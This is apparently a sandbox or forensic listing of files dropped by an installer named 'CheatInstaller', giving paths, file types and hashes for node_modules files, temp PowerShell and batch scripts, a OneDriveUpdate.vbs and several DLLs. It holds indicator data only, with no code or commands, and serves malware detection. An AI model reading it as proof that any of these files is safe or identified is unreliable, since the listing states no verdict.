C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\sigstore\dist\util\index.js	ASCII text	A7EDEFA723A7750B0006921BB47F915C	94B65DBF8EE3C0E8E1A96E20EDB413C8A70D5A28	C23AE19CEF27C42179E63FFF38485FCA67967EF9A81198DD1A22662E2CB477C5
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\sigstore\dist\util\pem.js	ASCII text	8C55B55D66D25413FAF8673016008B37	A4FF2F9A3E29A19FA14DCD33AFB1062C3B73B08A	895BABB75E6BEE72C5505CEA3AC224C48E608CFA2C94DA70308A8F281A8EECA0
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\sigstore\dist\util\stream.js	C++ source, ASCII text	35C7931AB5B5429DDCEA66C26BA8C282	5EE4AF23652708E5B669752396950BE5ADB8193F	CBFCCADAC4ECEECE00345F26933F9F9AA6ECA21DFA7A6BF7418387486EB31690
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\sigstore\dist\verify.js	C++ source, ASCII text	A1531A6C51299E70EBE614A57683BF04	D9E878E0C1C091C9B4F115B9EA5CD77CCBE53EC8	FF6BDCE2042AD64CFF53800019EA29EA7B61AE6B753CA5B0CA2E269C9BBE4DBE
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\sigstore\dist\x509\cert.js	C++ source, ASCII text	07D415546517C3C41508AE0E8BF38AB8	2EFEB69ED14A7EE1110360CC759F652776DD51CF	AF4158B432285A1DFADAD067FD30D44ED90E3E640FD26BD292AFAA2F609F895A
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\sigstore\dist\x509\ext.js	C++ source, ASCII text	3FD120F5F78486E52A20411FDD8C1444	0D2F1E448D977DB5BA9204EDD8521D06E467C925	E8ECBC88079CD11125478F4E9E1482EAB796B8C17180A2C639F0C6065D64F5EC
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\sigstore\dist\x509\sct.js	C++ source, ASCII text	1D5FD601E6558752F55C4104B24007F0	DAAC7261E893BA7A2B843A46A9CB9D5723A0EDAA	6E8359D95ADC1AC62C9045D3AF6FFA68879A4D9DE36E56CB4DCB33E2AA0AC17D
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\sigstore\dist\x509\verify.js	C++ source, ASCII text	5E5CD4504262E8116D9B637AD6EB7D91	9D009B314DADBCB85EDDC1E114A81139477D65FC	70DA6D1315296D95EF5CBEDF6F71A7E52B55D1AFD37B3BEC382C0BA28C3D2ACD
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\sigstore\package.json	JSON data	9EEC60D71C303E75465D141D7698AB75	B4CA5B5559A5FB5371C5F693BC32237EE2DAF206	770215C9A2D5A6A0BFD210494D953628708E9E070A50A710E031CBA7F9243565
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\smart-buffer\LICENSE	ASCII text	5B37B090A43E81BD880398260C467866	ECD174D7FC2C9C30751176131F7326063B36C29F	C46E2C333E1C9E6FCFD130CF91B8E54BF67B60FABBC04996F7E199B990353FF3
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\smart-buffer\build\smartbuffer.js	C++ source, ASCII text	58110B85E2C957B18359B12410FB8833	A829400A5F95AB47A4A45EBE8E2CEA062DBD223C	6A73858A0AA6F7AC078D8156187EF97A713E44D52AFCCF6679A0A032539BE0CC
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\smart-buffer\build\utils.js	ASCII text	694E19A8E768FCF6D41829940A58798F	6BE476ED504CBD33DA63B3DB302673CF04474021	451B2E82D359F3D8782BE4830BD5D9DF895434ADBBBD911FBEB27E64FC59167D
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\smart-buffer\package.json	JSON data	F1CDE8617855022E11FF922F3F37FF3D	A9DB89BE9421029BD73BAF8199042A08253A0B59	188644CDF467D6A768AD25ED3EE8EB845DC5CB29AADC4C88CA7C5CB5F631D66A
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\socks-proxy-agent\dist\index.js	Algol 68 source, ASCII text	5ADB471D3A87492ADF0EE87DFEC85E33	859709737D7877C776B7AE6FD925E49717D9C385	D1C106B38D026F562E8D6D451E56F460B4598C3096363E877DCD67D72E4F25EA
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\socks-proxy-agent\package.json	JSON data	53D45445ED105375521E6C18127B13CC	E942FB85A95E0C47E6330F2ABD707FFB4A1DA603	4873B91B353E2DBE3966B2636AC594419765202D353A8C27583535CCBF83E275
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\socks\LICENSE	ASCII text	742DC14598FB295B01DF682683C57709	DDC86900B60A427D5065CD608B79CA29CD07C2FB	4F4F28866154C8D758241A64296E8790D45D7D912FF7B029930778C06D8F2A72
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\socks\build\client\socksclient.js	ASCII text	B8A20E3A6637497E5F593970C4CCA194	EC03EA5CD2EBA904FA5BE954CE15D5DA68758584	F03DDEBD58F12926C6D8D885FF99AF834397CDBE389AF7C9AA07C10911517D44
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\socks\build\common\constants.js	ASCII text, with very long lines (338)	8A40929B54D6B415220AF435428C3E8D	CC49E53EE75BD2DAFAACF91137E426F9431F9F39	DFF2FAB7745C01BA69A14031297C67BF11CCB18CD1D7FA00C09C5FB58538D77A
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\socks\build\common\helpers.js	ASCII text	7B9C9FA202AF7B63D419168617CE1C52	DD404E32A0CD20BCA05E36A944DCEA6243E75AD2	73870B5FF3A6FF63AA49FC6780F9EEDC035DE61CE66E0DCB8A62BDF2CEB81C4D
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\socks\build\common\receivebuffer.js	C++ source, ASCII text	AFE7E8A00055390F83F45CD44B1A6860	EAA796D87A4B4065815C925970D84060053A9B4C	49FEB670A5499E20899D892740F80D1E3EF24DEB64888A21DCABF6FE7419B4E8
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\socks\build\common\util.js	ASCII text	B77592741B85E743AD45C3756F17D88C	11C868756E32E800E99A07D09F9AAFAF270DEC4B	917AA278ECF8A4EB0E90E448EAC98DD75EB9A4C985DE0D7A04E04407E8CAF8F6
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\socks\build\index.js	ASCII text	A9108E705F9E87A79F7AAC96D6EB174F	FA99F1564F37CEED84349C6A9D852A8431F70887	C82822BFE17665A9DE990C99E1AEA5D94874BCBC072F95B42C617BAB3D097DF7
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\socks\docs\examples\index.md	ASCII text	41366DB689D638DED2BD79CEE471CC0A	CC78455522DABFA45D077AAA31BC8296EE10ABC9	BB434D3247F08B691954F1414B172CB299765AB4C7F843E8204A539FF4E63EF9
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\socks\docs\examples\javascript\associateExample.md	ASCII text, with very long lines (381)	7E88D7025301C73EF87C6A9BE86974F1	E0B9BC2F6A4B5F653259E9EC2F2137B185A051C0	975B87E1D48D33A33F146FF341AA25191E40D3529D4FA653FBCDFE2212EBA612
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\socks\docs\examples\javascript\bindExample.md	ASCII text, with very long lines (375)	A4B19383ADA8D854F640C2E0129EEB2D	E61EFC6A3DEA97A8E9A6BCA686AB804A8CCCE0C4	5ADB174E1EB0CBDD5406F14635337F34A7DA6DEEDF65C1CEA484A302B2562631
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\socks\docs\examples\javascript\connectExample.md	ASCII text, with very long lines (325)	B794A4A5AFEECF53967396D6F61B14E9	C0497600A28F26A615092D486359D1A024EEC639	B426332B7DA73E8CEFAEE0D30F4B435E763B44B2AFFAEC7EDD167FC4B04279C7
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\socks\docs\examples\typescript\associateExample.md	Java source, ASCII text, with very long lines (381)	1698E881CBE37575C38706DC8528E1AB	28A1D0BCA3632E80DB36D16F97669ABBBEC928AE	97460CC4FBBCD1AC80A28386FA29A6BA9EDAF828C010F3159694D9EC66CAECB5
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\socks\docs\examples\typescript\bindExample.md	Java source, ASCII text, with very long lines (375)	8221EF1B3932922645A81D6EEBFBD3C2	194036E50C5591C32F190FB7FCC53C48C55F1B02	6322BE1CC9217D2A83B95C9DAAEA4F3CC1058B2C44EDE17D2717B8C9A01816DC
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\socks\docs\examples\typescript\connectExample.md	Java source, ASCII text, with very long lines (325)	2CA3396577CA674F265E0A5DBC15C45B	30A5BA9035A230701B92DEED893CAB66231CD123	436E5161A75D2734675818F560DC03082A6AFE8FD195A09120038A0C4F6290C0
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\socks\docs\index.md	ASCII text	1AF48F5F58204E0B6620B8926EA82E20	9EBEFF20A3E42B4ABC9A680920FCAB9E1AD545D9	A7AB0D44389BD05C9C918AAE8A573B13FAAFF412A6A652EE68D7C308D0E11FFD
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\socks\docs\migratingFromV1.md	ASCII text	1DD9A1AD1A510196BCE1345EC5B7C098	D319C2E14997ECB24CC217A69F0060C4676CC446	4CF23D36F5E98EC2DCD285FDBDEE1DB8B177C1DCAC386607B57087CA14DC3EBD
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\socks\package.json	JSON data	E32E801B5C4981B343EE767743EC2C7B	C40A5879E66B32E8B9BDCFB4E5FA654530190A39	71254BF50C6AA310311263DD5E1F3697770BE875E52154171B481797CAAC89D7
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\spdx-correct\LICENSE	ASCII text	3B83EF96387F14655FC854DDC3C6BD57	2B8B815229AA8A61E483FB4BA0588B8B6C491890	CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\spdx-correct\index.js	ASCII text	1CBE456F54F89AB119ABD582B46EC737	BD8E631A674FD29F75548547DA756954BB8253A7	BF6AAA22F934F48C945A0302EFF34D6E0EDB265FA06917F82CD41551465C8F6C
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\spdx-correct\package.json	JSON data	B4BA59EB9535EEC2410B41A92130F73F	A7A8F7467469C676A88934B972D08C03C9A4B7B4	4D5B264748A7510AD96A135DEBDAE4833A62506BFC95DF06C70D657096DF6AAA
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\spdx-exceptions\index.json	JSON data	1DE0D8927FE911B16A64953129B772A7	F0ED959C32C0610429A0B79DF837104FF580FB90	FB214B95BDFCE683A9EF080C3BA7A10BF45F7FDE3DCE422DBB3236C12783151A
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\spdx-exceptions\package.json	JSON data	39574483A6BE9B11884D0CD2812D3CEF	0EC1694E2F10AD1545E9132CDE02FE7A82F9D320	C6599B1734F3A73204866986A5E938740C96788359C3158ED61EE6236CAC3EA5
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\spdx-expression-parse\AUTHORS	ASCII text	71E34838130037A6B1C1F036AF5004A3	448B07AAC5B6DE983FB89D4B686B3E708F34D844	44BA6C2BC625F3B99BCE248A62B29B088538F4F337F9E04679547C1195E634A4
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\spdx-expression-parse\LICENSE	ASCII text	35A411D082D4487AB0E0287014CDDF80	A9293189DDFD959FFB54EF7805B1EAB21979D700	7EDB57F7065309027DE249642341292A5B21410D5773CC55BBA73FF9CF01060E
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\spdx-expression-parse\index.js	ASCII text	40825D7F343919005E5809025C14876B	7D9B17E093B4706955E0B8991ED0D48F5739A40F	108D9F96D7901B70F3CF4EA369EE2C7B3C47E28D23B9BB67A69A559831D245BF
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\spdx-expression-parse\package.json	JSON data	9DA13B6BBCD9C2EC5782FE1B0C0D795E	72082A3E9D4EFE5A06C914B7FFA738F35B550FFB	019A60839CF6B909B3F7F7079888EDCE8D9AA7DE6C296BB4EF7E2DF587173AFB
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\spdx-expression-parse\parse.js	ASCII text	BF8B106D12F806EA2DAFB4410ADE5001	F86A533BD13FF24966957E11BDB506EE7A91DBAF	629D3BEF1A8EA96455646D2D0594949FE6C332B2BE95FD7D2B6502A918C423C1
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\spdx-expression-parse\scan.js	ASCII text	38B1F87B7693B050F073300839B4E553	6CE4F78704ADBA89F90F4420365A306CB1BBEEE8	B3C4DCD0AF9B6E72CD1C56335DB37447657114E8201271653BF35C5BFE7AFBA6
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\spdx-license-ids\deprecated.json	JSON data	AD0BFCD6EAE2D786332E9B59135AE092	A02AA8FFBF58AB0179B51D578DF0AC75FA810CD6	6A132D20E843D088AE94B5C47B185B8528EB5AAAD82630DCEF82D63CFDD1F249
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\spdx-license-ids\index.json	JSON data	2525C1C7F5F3828AC8D1A087BB5406FC	3D79AF7B25A0D8654F06FB3875F4E11D7427059B	4525B9F9FCAC66BD5EC345F3BC095B69CBCFEB7B33AFDF37FC7A93E57FC85C66
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\spdx-license-ids\package.json	JSON data	3565C405B6B21B6D7AA3A38AFFBA0332	5996C0CEF6AE77708A279F423C812DE4A90C9C9D	6D1B14D2F6F141CDECB016E4E1B8690A5EA29B6BE37F90112C705835D8A84A8B
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\ssri\LICENSE.md	ASCII text	E1E465D0F0648BFF1FE285726C8D5ADF	1DD68471437A7F23E484C9A00043BC2CD4485C3C	3749709146345FA15546AABA4E3AB1B3B92A4D930077B5BC32D90815CB63AFAF
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\ssri\lib\index.js	C++ source, Unicode text, UTF-8 text	54CD91B88715FDB77E25DD1491A89EA6	13F9D79749DC1B444EEC43FB59407F100F541E40	3F6739B77CDB076A1645BFF911C13FE82F3C38BB2FF5E4C127B2A2FDFE122114
C:\Users\user\AppData\Local\Temp\Pro558F.tmp	ASCII text, with CRLF line terminators	460071F799F482B73D31DC844F80C3CA	A8E7AF7FEBF196F14CA4C2A47BF22AB054AE5CDC	434B5D7B02D79D0350D62B559EE5AE2B3EA5A32FF8088397E703465A9E5E6289
C:\Users\user\AppData\Local\Temp\ProC38B.tmp	ASCII text, with CRLF line terminators	5AC9A09AD7129CDF8018420436941436	9FAF44B5914F417F3837B5AE1912DEE31F743009	80099596C7145A9AABE154DEB7F20A49E7DD2F6FE98FEC794688F9C012109D04
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y50e32my.24h.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\cr.tmp	ASCII text, with very long lines (8190), with CRLF, CR line terminators	3FD78AC884F3B867FD1FAF2EAA0CCF71	7ACC08E8F717AC7C18EBA4B664F93D1CAD7DC335	97566C4DE0556852DDA6ECA5098EA584D466D382FCEE57E14B4F981203BAE5FD
C:\Users\user\AppData\Local\Temp\ferght6fj54f.txt	Unicode text, UTF-16, little-endian text, with no line terminators	263604C90BD2E99794D7A0C002B45542	1B947562AD1AAE7D8BF79D48354529A1EE655C86	26121CB70F66C1AF4993871F580F803EB4C4F9A1FDC1EE85DE1ABE0D063CE0EA
C:\Users\user\AppData\Local\Temp\progressbad.bat	DOS batch file, Unicode text, UTF-16, little-endian text, with CRLF line terminators	AB5F71BB2F51F8B6F130B2BE083A382A	92DB0CAAD0B9C3AB6B8BE29C7FFA3ED3F8D09D72	7B4E523830CAC46DD364741550F660887727368AEB4842E18EEBE390DC0BC874
C:\Users\user\AppData\Local\Temp\progressgood.bat	DOS batch file, ASCII text, with CRLF line terminators	845CF6630A4A8D184F93D0F732FEB846	1D9219177AAF25E5A95BDC72EC8CD6FD42E6CACE	19F3274B5B004259D609E624E54259D1637074A97AB7E6452DDD2BD81EE29153
C:\Users\user\AppData\Local\Temp\pss558E.ps1	Unicode text, UTF-16, little-endian text, with CRLF line terminators	30C30EF2CB47E35101D13402B5661179	25696B2AAB86A9233F19017539E2DD83B2F75D4E	53094DF6FA4E57A3265FF04BC1E970C10BCDB3D4094AD6DD610C05B7A8B79E0F
C:\Users\user\AppData\Local\Temp\pssC38A.ps1	Unicode text, UTF-16, little-endian text, with CRLF line terminators	A8A3A992FCE81410C5771C10F743F6BA	D0DD0C52514AFA2150B250E549DFEBF87758F191	BD580EA3519D7B9C2BC34D30B66AF13F580EE5BEB1CE828499F607300DBD9BEE
C:\Users\user\AppData\Local\Temp\scr557C.ps1	Unicode text, UTF-16, little-endian text, with CRLF line terminators	B4F681D48CEA71BF4DD3ABB801358CB7	A008E22501E5062C1B77D6271817BCC54A470FEE	D11012B0F68974184A369832E23A821B63ED66E44C2DB638C6E312322AFB0D3A
C:\Users\user\AppData\Local\Temp\scrC369.ps1	Unicode text, UTF-16, little-endian text, with CRLF, LF line terminators	B4AAF8EAA1AA2477670ED54128E2C742	B756FB677993BCF92916BE8979052ED14A6170DA	5A4A897B8E922880F81B7AD94877ACF3B394FFFC1811D8826035B33D383624BA
C:\Users\user\AppData\Local\Temp\scrC36A.txt	Unicode text, UTF-16, little-endian text, with no line terminators	64D1817B6BFCD6CFDA309F8910F51B57	9FAF2D4A707B789DE6970B53B0DC80AC47EC3C52	067838889A9EEB91ECB3FC155F3BFED21BD86D8C789D6485CCA2A6D6A6BD4391
C:\Users\user\AppData\Local\Temp\shi3348.tmp	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	11F7419009AF2874C4B0E4505D185D79	451D8D0470CEDB268619BA1E7AE78ADAE0EBA692	AC24CCE72F82C3EBBE9E7E9B80004163B9EED54D30467ECE6157EE4061BEAC95
C:\Users\user\AppData\Local\watchdog.ps1	ASCII text, with CRLF line terminators	BECEB9C4AC840A5AC0B51D8774E63149	EA375FEE5FF404065BA724E877C9A9B01509353B	D2011DCD715DAD784B01709BD0AF62C07A91AAD758F6E461005178A74C2D3B34
C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_birds.wav	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz	639EB4627992165DAD32AD41DF746BF7	286D70C527D4A0D03C5FEB0348F6D6E507AFAAED	FB5A9508C75910052B7761A50028084912581EEC358F6378D5865A531B71CA64
C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_drums.wav	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz	123437D6F80FE45F397A067CE4872D89	3B981369C54593B4DCFD3F7E08DB8F3E67A3FBA9	25289632DCCC370B326D589D06169C7383C0A39B6D220DD468A01C785D54ABF9
C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_piano.wav	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz	82E152E8A610DA8132789C9D4A4D1D3F	055180B27A639248C3BE0B2D875630AE256D9890	82040461EEBB7AAF3C6055884ABCC642300FF37D241A1B7EE794E0B0B45B88D7
C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_timit.wav	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz	B1938437BFC4C13E424990F4D3F2353A	FC63B1E664C5EA8FAA8B5DF75A2756E59AE7A40A	D531ED6375A6ADE4D449389B67E0A312FC97F3FBD025A627ABD72F2705FDBC26
C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_parametric.wav	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz	DE35645B9BCA5DEE784285EE52AA407E	3E23801FBA4D83EF2C8F2ED772B0AEDD8B1395B9	A5289B50B6178E8B4C3EA814A0C25CF4B4C2C8E3A0E30E416DBDAC49A61D3864
C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavenet_r9y9.wav	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz	4A1D53E7FD0F268A7FD23FB9B3139EE3	A80942C3CAB97EA97B2406FAB965BB4B3C16C2FE	7832608E235911200D1C224C201D3AEFEFE3B154911A53C2507CD83E31447C1F
C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_birds.wav	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz	0390E78A8086536F56E11B0B40BE2D62	BA61E82CCE9E0EF301DB174F83E94B9244FAA799	9102B9E757CEA1FDDFFD0F82888FF829AF7F11F6C522A31939FD54DAF0B3AA22
C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_piano.wav	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz	5B88B489CE5A9207F1B60669D32F7A0E	D2BA6F65E8091324B5042BAEFD58BDE2177FA724	216FDAAC90960EE05FF540FE214CFDC314B4AE57892437C940EB7B0EDB9BC87F
C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_timit.wav	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz	9C82673085C3D170DFA63A6C7BE31776	3A753DA6E8FEF9A09E841DC2CD1F7D97832DFB65	0FBF274C9A44E2E2842423BDFE570A5BA7CBD4E1C4AC5446E45C56D022FB1FB7
C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\specgan_sc09.wav	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz	9D8691FD2B28078CAC74060D0FD33BF7	21D9FA20835C46CEC90641380EA9AA71C57AB85E	1BBF3A28BC06757CB8A3B19BC7186C583594B18AC459DF231CF9C9AABB1F3BB9
C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\specgan_timit.wav	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz	FDC8F9825BAC64DBDCEFF1B1ECFBCF53	D831B8FC76023AF06B13A05811C18611B7C394F3	9D0E13FF2E27A1E3DD01847E67CF787050764C8B1369D90A60A3A03AA498D00A
C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\wavegan_birds.wav	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz	853A0BDC85B59FC1A06781F42FD0216F	24426A4E7C4F2BE495B0DE7E0788F8682F9A31FB	3AE7B8FD29A0224527A0027EFFD3578A1933A0871B5C37C45945F8FC172CF62F
C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\wavegan_drums.wav	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz	904CCCD295D852FF49BCE31AB91A85FE	AAB7323C0F09DD6DE9E61FE4798068F34726F32D	896759170C3F3DA93CF1845B58A27F2DE54DBC3848D46C8B8E742C650C00FB30
C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\wavegan_timit.wav	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz	76E4BCF00155868A04DA362E3EAB8F1D	61A69467F77DD11FAF27D89C0551DBDE841EF6D7	F5216444BD05C2C0E5333287D83CADA96CAD9F90DBD6F3737A97ABBF0FB3510F
C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\LocalAppDataFolder\OneDriveUpdate.vbs	ASCII text, with CRLF line terminators	214EE30DBD649AF9294F254FC8C33D07	E81A7486C5C19868ABB7D39FC757F686C4124662	D9747024F7951C01C90B39E18EBE0A490A956625422F165D53F917AE062C4E52
C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200, Security: 0, Code page: 1252, Revision Number: {E80C0689-9541-4B8A-A2F7-42C1223131F6}, Number of Words: 0, Subject: CheatInstaller, Author: OpenSource, Name of Creating Application: CheatInstaller, Template: ;1033, Create Time/Date: Tue Mar 12 08:44:30 2024, Last Saved Time/Date: Tue Mar 12 08:44:30 2024, Last Printed: Tue Mar 12 08:44:30 2024	88D6EF66043282511D78477C3457CD05	DEDF2529B0F78F9D7DFE5519D080FE1D11FB0344	82EFCBDA4A568F2E898F2C97D3876AF8C4C42F2638A339B937B01202BB83FB4A
C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\db.MYI	MySQL MyISAM index file Version 1, 4 key parts, 0 unique key parts, 2 keys, 0 records, 2 deleted records	F0BB4307AFBD586F0499F4023213863D	CD978F445F02AAB75B1D89C5E28E348860D8C306	49A2CD5CE74B5969DB3EB785C02FDA21F207672B2348C95252B3200D05281129
C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\help_relation.MYI	MySQL MyISAM index file Version 1, 2 key parts, 0 unique key parts, 1 keys, 1028 records, 0 deleted records	B7D1F26327BF857BF6CE98EA4FDA22B1	B3F9C0DD62D5A7F533BE36664F8E4954CD1F216D	7CE3F6771B4C0A0C0E662DC51ECB460AAE223BB3292EAEA6C1C6F1BB805B3786
C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\lang_fre.txt	CSV text	5B1A12EDC7B4E82163E5B39694E5B630	088D6DF18CE940CF01789A27ADEAA150F9DC26B7	206BAC7B50B6BD8467CCFFCB6D0833C4C8C58A2E82D205F608D4127DDC3402C9
C:\Users\user\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\holder0.aiph	data	43A907E3E919CBDC3DFAE78B68949212	5950D53E8110776C9A0463093A0928335E804A0C	B80DCB6AF4814BF5C0B6E460CA7B6BF3A970242869B83ED62208AE21F9504D94
C:\Windows\Installer\MSI12E1.tmp	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	18DB7A45912D1664716EFDF6E311F5F1	24A5D1D2ADDF8095E6F5E4040A2E1C44956BB141	5FFA59B2CB0995AF80DE9CE944BB3E2933C42CEA0D764C0AF137FF842DC7FD0C
C:\Windows\Installer\MSI963.tmp	data	94F99BEE6A7C202CE2E8194514D9A6ED	ADF190EC0A86E148F0ED2194ACC0CD8773418DED	A9875B8ACDCE1984C7FE58508798FDFC8963C9B5A878DAF0D6888A48D836DC76
C:\Windows\Installer\MSI9F3.tmp	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	165F730F078C7019EA5F2642F8208CDA	370F2E4D1F298B62C1D4743D0E23D2A2D41F950D	48F509D74CA1AFA44B3053E5FB0DDC15D56CA8844E9D150419891C5A38A071A6
C:\Windows\Installer\MSIBF92.tmp	PE32 executable (GUI) Intel 80386, for MS Windows	8D49691D4AB2FA3CD8C679C0DF30C1A1	71B8B4619A2B0632920F84F740E7B27AF62A921E	8412DC56077A9219C7CD04E0FCCC2391EB62E32A86AD27E58B24D83C8E8227A5
C:\Windows\Installer\MSIBFC2.tmp	PE32+ executable (GUI) x86-64, for MS Windows	CE5552C3B309A5F507B31C0AF0C0CABF	5A5A35EA887677E411EA5EA86DD6881D62DB6EDF	3C2DC5BA528D5C31CEFACC19F693B35512EB7D500511B0DBC79762D3F5F7842C
C:\Windows\Installer\MSIC26F.tmp	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C9C085C00BC24802F066E5412DEFCF50	557F02469F3F236097D015327D7CA77260E2AECC	A412B642DE0E94DB761EBD2834DDE72EED86E65FC4A580670A300015B874BA24
C:\Windows\Installer\MSIC28.tmp	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	CAC17C92ED0D30BC68CE60905E0AF1EA	29589B5816214F537FFB03A4FF9C79F1BD25908B	E5A59959B68626F622C7A27B2A42468DBFE03A6D956B58B2CDCCEDF0A632D161
C:\Windows\Installer\MSIC2DF.tmp	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	6BB65410717BB2C62ED92CDBC9C41652	1F0D56A24588C0C07E878F348DF6BB0C3E4F693A	91A6C5DAEBE89B7D9157188A2B3FA8E47D53B4D20C29BCC244635D1943397F7B
C:\Windows\Installer\MSIC30F.tmp	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	A8338E7B3CE49AB7E793952765AC998F	29A2DD67EBA553530F84F9E02266474EA678ABDD	6FA584E22FC546B95FA757279CE5569E5540BF2AC28B138ADBA41877FE0C645D
C:\Windows\Installer\MSIF889.tmp	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	2557173F4299722AFCE46CC3C0616406	B0343C9A9552BE977834E415783B486C4714FE97	E25369E33C7EF36151769A86D833189B275F85045F35873E9E931547E0A6D591
